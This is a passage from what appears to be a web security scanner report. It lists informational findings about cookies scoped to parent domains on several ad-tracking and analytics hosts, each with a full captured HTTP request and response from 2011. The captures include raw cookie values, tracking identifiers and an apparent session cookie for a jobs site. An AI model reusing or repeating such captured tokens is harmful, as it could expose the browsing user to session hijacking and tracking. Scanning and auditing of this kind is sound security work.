Cookie: icu=ChIImdYCEAoYAiACKAIw447n7QQQ447n7QQYAQ..; sess=1; uuid2=2724386019227846218; anj=Kfw))ByDuq(FJl:c9U(O<@CeVOmEXW1hL>#/*4Jn(uor=(5EBh5<W.k)Y><WiS:LOiybjU0r>wWIql]AvGq/IdS!acC(FaP$cYJ!J#h1Y$?7kmw?YIqgimiBWWi-dkyfpjFRO44ek(e!)zV^HsoI@m5(lVJ]-z44hi<@/+Gxw$#QV%Etka*a%eva$=@Au!AJSu6uj*@oO@]EL5n0EQo`R]:t/`eU_45K!c^VKH`O2$i'@`s.wMV-wH9)D=aab*.arK7xs@L$@.CbO?Kb?0ZuKR(FN+u4M#Er2:Iua<E_XvS:>yEy6m-9JBYXUm+V1/.@>oBLAQ/P^+8=*EjA[(GADvf*BbS#E1e?YTKA$'LPYDp0.fkASgZh0i(^P[N`AV7o.$d3BYa-u[VwBx:I(G/:381kcgHWoswb:=`Ku>u@Cidi%Y$u9`qSJ<7rlOS'j/U/>:p6qkC9x[=9>gzl!f)'vJRUdB!F`KgLFB[sgim_V^-4E!hC:TT[Mnnesvth<EqmD]T6X<+EXw*eL#7V._]eR7wKz#+Q<jY0)9m4.Ux(+g2x6gtKj2Uf7bK$d-7jQI=`H%cII=9QVL!LY6%gg!la[qizZ#JNdA3x'%jK#?C9j?>vs79'K>b2_7w$cAnjrNM]

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 03-May-2011 02:07:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 31-Jul-2011 02:07:36 GMT; domain=.adnxs.com; HttpOnly
Location: http://loadm.exelator.com/load/?p=204&g=011&bi=2724386019227846218&j=0
Date: Mon, 02 May 2011 02:07:36 GMT
Content-Length: 0


16.33. http://image2.pubmatic.com/AdServer/Pug

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTcwJnRsPTQzMjAw&piggybackCookie=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&r=http://a.triggit.com/pxpucm HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; KRTBCOOKIE_53=424-c1e1301e-3a1f-4ca7-9870-f636b5f10e66; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 01:56:32 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104; domain=pubmatic.com; expires=Fri, 25-Apr-2014 18:46:33 GMT; path=/
Location: http://a.triggit.com/pxpucm
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://a.triggit.com/pxpucm">here</a>.</p>
<hr>
...[SNIP]...

16.34. http://loadm.exelator.com/load/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadm.exelator.com
Path:   /load/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/?p=204&g=001&bi=CAESENh7sluIi3Lo5TRo_oosBvM&cver=1&j=0 HTTP/1.1
Host: loadm.exelator.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9jbS5nLmRvdWJsZWNsaWNrLm5ldC9waXhlbD9uaWQ9ZXhlbGF0ZSZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vYWRzLmFkYnJpdGUuY29tL2Fkc2VydmVyL2JlaGF2aW9yYWwtZGF0YS84MjAxP2Q9MTAzMSIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0xNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=8d858ba9e9afa8b40a627b6ea0e852d0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJwdy6sOwzAMQNF%252FMY%252FkxI8kLlxJyUg1PNWpKw1PQ1P%252FfQ92wbmbFXs%252FjQxuywzTt4pBrsLuKqiFhngwHWNDlzqoZ9z7z%252BVs8Hrs97UgL9fLf1WDQVFEOVJt7omPkOSYNfXwaNGQFQmm8wNVyR9D; BFF=eJylks0OgjAQhN%252BFJ%252BgflpYLigdJpCbSEDwZjp49qu9uBVKX0oI%252F1%252F12pt3MtBIn8naVOJZRRRArVH5HOBNCxFF6MWOOUkOpjMqD0rv96VwXVaGjtJVEfCBEkEJALHA13BLHSGPEytc2GQA2IB7mYDTapR6gAiYqtDsyGQ5eb5vh4FVPEwIO7ikExAJXwy1xjI5lk2HzOicA0G7u2RQIJxg5YL3RU0C7Ody0IdbjEEc39dRzkwGuxoZYw30OjIj%252Fw28OAQMPTVQcdGzWNQ%252B55q7qMdtQbxlZqHlsrnm%252F1izcpmBxvu%252FJQi3C6S8G%252FVeeM7E9AdjlJeY%253D; TFF=eJyNkj0OgzAMRu%252FCCWyTkNgsHKMrA0Olbu2GuHtNy28SkAeUEL2XfB%252BkF2QZ34IkFYHrwGPHzFS1vZCMT8FWHx9AB1inU8b7ma8Tntr%252F69ELm2YzdA2cfe%252FhMbz6z5DsHWkxfKEFznEaKLZ2O48FPuvglnMo8cKm2Qwds9YrWV9kIix3wHs%252B64D51z12UM1q%252FO4Ixg6ASsni3lmnM%252B92HpnrQFf%252FEW9MBoxZxmvznDG9x1avsXph02yGrmE0kdMXsnf1Bw%253D%253D; EVX=eJyNjLENgDAMBHfJBP%252BGENsZxkqZmhJld5IGCYmC7qQ7XfPNr%252B5mlmtzWYx6OtUTc0GUEOyBzJBgqt35WJVlqQFIYNkxR6ASc8X36js2O36l4wb%252Bpiq9

Response

HTTP/1.1 302 Found
X-Cnection: close
X-Powered-By: PHP/5.2.1
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: image/gif
Set-Cookie: xltl=eJxdi7EKgzAURf%252Fl7YEkLy%252FROFl1EFqH2kI38cVIhUIGsUvpv9d27HK4HO4ZPfrXugOubQ3FvrQH5cgwW5JWYyCOBucwSiYXMFdyyr8%252FpTxsyzT0Wpq2q36p9RAwarImCpcxCzNHEiyVFXnkmMVMGivxPy%252Fr21dp56Eqm77p7m59bO2Cx0SXcxpSWg%252FPExTvD46AL4M%253D; expires=Tue, 30-Aug-2011 01:58:26 GMT; path=/; domain=.exelator.com
Set-Cookie: BFF=eJylk8FugzAMht%252BFJ0icZCnhAmOHIhUqDYTYaepx5x67vXtTglInjek2rv78%252F8T498kAmMvZcGWyHphsuvqb8TLPc5UVX7asWWGpMFl77Ib94eNzbPpmyIqTEeoXQoYpBuBBrNGeREYDZ7K9dcMCuAVqqaNS0CsSoCNMOqo3MFkGrt6mZeAXR3eABnYUA%252FAg1mhPIqP3diq5%252FboGBMRcT3TmjO84i0D1OjwCMddxp1%252FiGC4xmMnRxEwWxBq%252FxBH3a2QE6QffOQYSfehBpVHGVl1ryrVOqPCagfoljtJrVol3zhpBv9PxxDtnz1D1s3pJyaOR1IXItQv57znQqScD%252Fvc8P4kvndKngdyUuw3x2pCilbBcAf0YadM%253D; expires=Tue, 30-Aug-2011 01:58:26 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJyVk00OgyAQRu%252FiCWYG5GfceIxuXbho0l27M969UK2oAwYXBiTvke8THJgUT29G4oZA99Bi772nphuYeHoyduFpLYQB%252FtNZ8G3k1Ymnbnnde3bT6oywBvpIOlpJknuPj%252FE1fMamYJhMC4xxDGRb68RjhhcdtEyGa7JVqzPCeG69kaqQiTDfAa950QHlOew7BK3W%252BN0RdD0A5ZK51DlMI68Tj94rS6VzxAvTAzqRsWweM57vca1naj27aXVGWEN3J1O8ZpD9h%252BX3PvL3uifvVvdFqzPmL8HjKUg%253D; expires=Tue, 30-Aug-2011 01:58:26 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 02-May-2010 01:58:25 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 02-May-2010 01:58:25 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJyFjjEOgDAMA%252F%252FCC%252BxAIU0fE3XszIj6dwqVkKADW6Szc84221EsxhhS7jfSblSbGDb45oLFEejinFIxPlTlolQHxNGpfOjVBTutTQMq0UR8i8ZX9d60tqj8RcdNL2s9AYowOVA%253D; expires=Tue, 30-Aug-2011 01:58:26 GMT; path=/; domain=.exelator.com
Location: http://load.s3.amazonaws.com/pixel.gif
Content-Length: 0
Date: Mon, 02 May 2011 01:58:26 GMT
Server: HTTP server


16.35. http://loadus.exelator.com/load/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /load/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/?p=218&g=002&c=153225 HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJwdy6sOwzAMQNF%252FMY%252FkxI8kLlxJyUg1PNWpKw1PQ1P%252FfQ92wbmbFXs%252FjQxuywzTt4pBrsLuKqiFhngwHWNDlzqoZ9z7z%252BVs8Hrs97UgL9fLf1WDQVFEOVJt7omPkOSYNfXwaNGQFQmm8wNVyR9D; EVX=eJxLtDK0qs60srS0NLVOhLANrIutDC2slAxNzQ3izeONDEziDUwN443iDZWsa2sBRqkNBg%253D%253D; BFF=eJxLtDK3qi62MjS1Ugo2MjDx9HOuMTB0sLS0NFWyzgQKmxtYA2WNrZR8%252Ff1CPHwi48M8gz1DlKwTrQwNiNBogCyLLGEEl0DXYw6XQTMoxNDAxBek2ggqYQiUMIWKIwmhqDXGIuGHwxA%252FXGoRhtTidTpWV5rgcpIJPifhsh8AGMBniA%253D%253D; TFF=eJyNkD0OwyAMRu%252BSE9gGioCFY2RlYKjUrdki7l6jhghhWjHw%252F57hI3kkf75rvxHoCAajc462kDwfPD0GbsYCD9CmRfCm8mrgKXyXvWdvbc3gPdDrtfOeX%252BnIY219GXqSAutzHjBN3fE44UWGdg8Nnr21NYNHkbqR6sebCOcZ8D8vMqD83T4Da2tG%252BQCHK5kT

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: application/x-javascript
Set-Cookie: BFF=eJylks0OgjAQhN%252BFJ%252BgflpYLigdJpCbSEDwZjp49qu9uBVKX0oI%252F1%252F12pt3MtBIn8naVOJZRRRArVH5HOBNCxFF6MWOOUkOpjMqD0rv96VwXVaGjtJVEfCBEkEJALHA13BLHSGPEytc2GQA2IB7mYDTapR6gAiYqtDsyGQ5eb5vh4FVPEwIO7ikExAJXwy1xjI5lk2HzOicA0G7u2RQIJxg5YL3RU0C7Ody0IdbjEEc39dRzkwGuxoZYw30OjIj%252Fw28OAQMPTVQcdGzWNQ%252B55q7qMdtQbxlZqHlsrnm%252F1izcpmBxvu%252FJQi3C6S8G%252FVeeM7E9AdjlJeY%253D; expires=Tue, 30-Aug-2011 01:55:56 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJyNkj0OgzAMRu%252FCCWyTkNgsHKMrA0Olbu2GuHtNy28SkAeUEL2XfB%252BkF2QZ34IkFYHrwGPHzFS1vZCMT8FWHx9AB1inU8b7ma8Tntr%252F69ELm2YzdA2cfe%252FhMbz6z5DsHWkxfKEFznEaKLZ2O48FPuvglnMo8cKm2Qwds9YrWV9kIix3wHs%252B64D51z12UM1q%252FO4Ixg6ASsni3lmnM%252B92HpnrQFf%252FEW9MBoxZxmvznDG9x1avsXph02yGrmE0kdMXsnf1Bw%253D%253D; expires=Tue, 30-Aug-2011 01:55:56 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 02-May-2010 01:55:55 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 02-May-2010 01:55:55 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJyNjLENgDAMBHfJBP%252BGENsZxkqZmhJld5IGCYmC7qQ7XfPNr%252B5mlmtzWYx6OtUTc0GUEOyBzJBgqt35WJVlqQFIYNkxR6ASc8X36js2O36l4wb%252Bpiq9; expires=Tue, 30-Aug-2011 01:55:56 GMT; path=/; domain=.exelator.com
Date: Mon, 02 May 2011 01:55:56 GMT
Server: HTTP server
Content-Length: 760

document.write('<img src="http://ad.yieldmanager.com/pixel?id=199372&data=218002&id=901810&data=218002&t=2" width="1" height="1"></img><iframe width="0" height="0" frameborder="0" src="http://loadus.e
...[SNIP]...

16.36. http://map.media6degrees.com/orbserv/hbpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://map.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=3669 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: map.media6degrees.com
Cookie: clid=2lgj1xn01171tpz736nle06u0000000117010701201; ipinfo=2lgj1xn0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2lgj1xn01171tpz736nle06u40p9l0023d010j01501; Domain=media6degrees.com; Expires=Sat, 29-Oct-2011 02:35:32 GMT; Path=/
Set-Cookie: ipinfo=2lkjr780zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; Domain=media6degrees.com; Expires=Sat, 29-Oct-2011 02:35:32 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sglst=2020sag3lkjr78000000013d010j015010tglkjr78000000013d010j01501; Domain=media6degrees.com; Expires=Sat, 29-Oct-2011 02:35:32 GMT; Path=/
Set-Cookie: vstcnt=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 02 May 2011 02:35:31 GMT

GIF89a.............!.......,...........D..;

16.37. http://metrics.washingtonpost.com/b/ss/wpnipostcomjobs/1/H.22.1/s96068415066692

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.washingtonpost.com
Path:   /b/ss/wpnipostcomjobs/1/H.22.1/s96068415066692

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/wpnipostcomjobs/1/H.22.1/s96068415066692?AQB=1&ndh=1&t=1%2F4%2F2011%2023%3A33%3A45%200%20300&ce=UTF-8&ns=wpni&pageName=wp%20-%20front%20-%20jobs%20section%20front%20-%20front&g=http%3A%2F%2Fwww.washingtonpost.com%2Fwl%2Fjobs%2Fhome%3Fwpsrc%3DAG0002174%26keyword%3D4846831919%26cre%3D430450907%26g%3D1%26s_kwcid%3DTC-21380-4846831919-e-430450907&cc=USD&ch=wp%20-%20jobs&server=washingtonpost.com%20jobs&v0=AG0002174&events=event1&v1=wp%20-%20front%20-%20jobs%20section%20front%20-%20front&h1=jobs%7Cfront&v2=wp%20-%20jobs&h2=washingtonpost.com%7Cjobs%7Cfront&c8=Monday&c9=12%3A30AM&c10=Weekday&v14=New&v15=First%20Visit&v16=1&c17=First%20Visit&c18=New&c23=jobs%7Cfront&c32=application%20-%20jobs%20cluster%20-%20jobs&c33=anonymous&c34=Commercial&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=983&bh=903&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560; WPNIUCID=WPNI1304310786188.9974; mbox=check#true#1304310850|session#1304310789089-468386#1304312650; rss_now=false; wp_pageview=1; __qseg=Q_D|Q_T|Q_2919|Q_2917|Q_1665|Q_1656|Q_1647|Q_1645; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3DAG0002174%3B%20s_dslv%3DFirst%2520Visit%3B; s_pers=%20s_nr%3D1304310825793-New%7C1306902825793%3B%20s_lv%3D1304310825795%7C1398918825795%3B%20s_lv_s%3DFirst%2520Visit%7C1304312625795%3B%20s_vmonthnum%3D1306904400800%2526vn%253D1%7C1306904400800%3B%20s_monthinvisit%3Dtrue%7C1304312625800%3B

Response

HTTP/1.1 302 Found
Date: Sun, 01 May 2011 23:34:44 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DEF70A05013F13-40000109A0000067[CE]; Expires=Fri, 29 Apr 2016 23:34:44 GMT; Domain=.washingtonpost.com; Path=/
Location: http://metrics.washingtonpost.com/b/ss/wpnipostcomjobs/1/H.22.1/s96068415066692?AQB=1&pccr=true&vidn=26DEF70A05013F13-40000109A0000067&&ndh=1&t=1%2F4%2F2011%2023%3A33%3A45%200%20300&ce=UTF-8&ns=wpni&pageName=wp%20-%20front%20-%20jobs%20section%20front%20-%20front&g=http%3A%2F%2Fwww.washingtonpost.com%2Fwl%2Fjobs%2Fhome%3Fwpsrc%3DAG0002174%26keyword%3D4846831919%26cre%3D430450907%26g%3D1%26s_kwcid%3DTC-21380-4846831919-e-430450907&cc=USD&ch=wp%20-%20jobs&server=washingtonpost.com%20jobs&v0=AG0002174&events=event1&v1=wp%20-%20front%20-%20jobs%20section%20front%20-%20front&h1=jobs%7Cfront&v2=wp%20-%20jobs&h2=washingtonpost.com%7Cjobs%7Cfront&c8=Monday&c9=12%3A30AM&c10=Weekday&v14=New&v15=First%20Visit&v16=1&c17=First%20Visit&c18=New&c23=jobs%7Cfront&c32=application%20-%20jobs%20cluster%20-%20jobs&c33=anonymous&c34=Commercial&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=983&bh=903&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sat, 30 Apr 2011 23:34:44 GMT
Last-Modified: Mon, 02 May 2011 23:34:44 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www77
Content-Length: 0
Content-Type: text/plain


16.38. http://pix01.revsci.net/J05531/a3/0/3/420/1/0/12FAEFBC31A/0/0/00000000/301977419.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix01.revsci.net
Path:   /J05531/a3/0/3/420/1/0/12FAEFBC31A/0/0/00000000/301977419.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /J05531/a3/0/3/420/1/0/12FAEFBC31A/0/0/00000000/301977419.gif?D=DM%5FLOC%3Dhttp%3A%2F%2Fwww%252Ewashingtonpost%252Ecom%2Fwl%2Fjobs%2Fhome%253Fwpsrc%253DAG0002174%2526keyword%253D4846831919%2526cre%253D430450907%2526g%253D1%2526s%5Fkwcid%253DTC%2D21380%2D4846831919%2De%2D430450907%2526thisNode%253Dhome%252Ejsp%26DM%5FREF%3D%26DM%5FTIT%3DWashington%20DC%20Area%20Jobs%20%2526%20Careers%3A%20Find%20Your%20Perfect%20Job%2C%20Search%20Now%21%26DM%5FEOM%3D1 HTTP/1.1
Host: pix01.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4ddcf645&0&&4db782ef&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4ddd4f0f&0&&4db785ef&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4ddd5040&0&&4db783f9&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4ddd50a2&0&&4db7974a&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4ddd7ae8&0&&4db793f3&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9SENLipv597JLOz4/ywNPTNxEVAOIYCdRelXOzKIRj+39hgkAwD0RltVgL5OR8z4ufqL2JTRgutCG8bH0i2CxMBFHo63bCHdwHxB4BmexyTA8QJJCrTjwem4Rz6vlfmAXZaPkg3/fgGQdxMq5vA03XyhyjKjrmnx6+FJVKmvq1UtLolE/wIYHveGzjeajpDXWQ1J7CBJjBz4B6eDrX2L08P9ZFPE6oRnJWx8uw8wJBAU393RlttIzV+Qhn8MKk7OQiBDL0BgW4aB/MRo1q9ia3EciExyL5yLPHJjIBNhX+QqfSs5Cl4QzaZ9F29c1QiBqzSWOiWdhbBatzmnixywgT8lvFnT4QL3q0Cj3x9XfuCF0IE+G1vSGcP13Prb15jSRxeRn/X3s2YOmR3K3w4IGfd/riyQEciK7VP3tLodiYFLdClT1RZYi22aneJA71eL7+Ya9/kRvCgp5LiQPt6+rIhd7ZRsW0FEhTWmbpqYcAVEfS0I3sPOGB+WigblQoB5h4djNBQndjcxKmAZ9rGZAPkKN1/UYr+qOjTdwypVpD6P/cdrwUFvb2KW5DQMuxBXRUggNPND2K7/fNsSwE1eFYYWAkfouY3GUlBc02ZuTo+msRjGLZflLAgjK0YKoR5qRhxh1tf+3K1rpnLvPkp9vz9k6PHr4SmrbNefYS1eYWN06OW5SgSYNzlmltyIXRjTzJ8Xgexa9RpvUyxXuyDstcFfBbATJM8gsWvZXVRC05ZxtEuXSpyGib+Z7pD1NAV6PTRkoBxWal3h6saqOb3SGIeMNBJ+jx1JOF1QF42HSqHlryDRDZ5kreBCo098HNm2PCKxfBeYNL4lcGIeYBXTb/+QAoqh0PqlKL5XqdArvsfziWOyLnTh0Kkq8XB7bLjOyK6x1DYKg7uumGCcuzXWMeutXR1EGd5ZojkPFq4/lhF8bFM8/2VZOLN5O155wZf/X9644rvMJpsKp1BZrHZs+/rpF/6Vg/uo2+obA/ipqe7I7Oj/r9T/PZFmGD8BtQINx/SgMTB6KGjn2nGlqBU7iD6LVv3qvJufGtydaJV+FYH7rLKOx0NULq5A+/LZTT6GsUoR2IuhBzpInYsMMiKmKHRhIz3Kvyhv0Y39fsTnOpUH1Ya0wDfK43SrYmnk/T0ct1UlNAk1bx10Q1aY7bidfsGH4wyNw/B//zjaHmOf17HK; 
rsi_segs_1000000=pUP15jOFb3IQDqIu1Hhm/da3+uSni//DBRincYhphhdmEVPNelSxYUS4+U1Joi+vXIZg3CJmbl6qO0d3dqlvOWYpudTV4Voav+Q+5zpE+UjDPyzpV/8S6whLBR2lB2WawM3t+Fb3ocE+VD+HVCzXcWQrjQd9nfMwL8eiWwp5rJfCON223S82t0AJ7E0fYcONDby07hqAtzkyS/Zh39I6n85ANWCrqvA4l/0dGi3VrJ+5ZyaadxnN/OBC4X5GhWxfABQU5Rl8fKTwUYRcs7znb3Qum3v0KY3igmRpDolWPrACkf1Hc6JQwYLC4MGoQsiXhR/YGQoGf7hVpjxwR4y+8tHqy008ecCB0dNuqTRG; rtc_xaNz=MLsHtSEOYQ5jJhFEjE7V7MKBJ1QDGTL0xZ7zF8dplkWrbITDjmJ8eM707TdmNgaI0g3GXcR/P4Fxz8PfR2IjDW2RJK83tn47FGJ7fdq8ELqyjVgasfcuWDjdORh1shdmyU9uxedGSanbaBz1PaqWM/PREGl/m/qeHXc/WZH+Dgo6X96L+pCBorF+TNxQRAWfzWjMj2I8o9ObxoZCICuBK1/2qL55SlebEPPHZZv0mxkLGyY/WIYPOZhhttuMr3Q4z2/BD8O8pL3CkSzGuuDTvaTc4qCxMoP2Jezab7Qw87iMMi0epru/jxgjCl9WnuD2iMP9Ckn5dTYpQVfaoTdsNkpA7y2M06nH6rH4wEcBgkSx/uBET30t3wIlJ6HsTseIP1z5gWfvqaDt/JAuZpm/cJa2QAmWLJl6wswHJo+HB/6sevl3T1Ahn4inevXQhVzP5SzYP4YkU+DIxlvIq5DKRzbtlJ+t0ni/DWuiUJb+DLW3NUMwiGFMTXNUcvEZk1zr7Qd9etu3kEz3AzjYrZbAyqyXgsLC1QaEfLCSooqB14xwUHyaOJV823ccZQxty6+H4QCPsf4KNBH5KTfvm33EtmPRX6H55suB1YW3hnQdc9AiiXRQag323RigTOhwsgA1U0SNCgdSSrIaUdceMZt7Nt8gD1OxVsOQvH4cKbfBNN5SQzH23EjjvuKap8ozWuTb3OKqW9ddvuo/LcB4KOuJxI03Yohpr3qjo3F91PC+X25pmiXd3QIi; 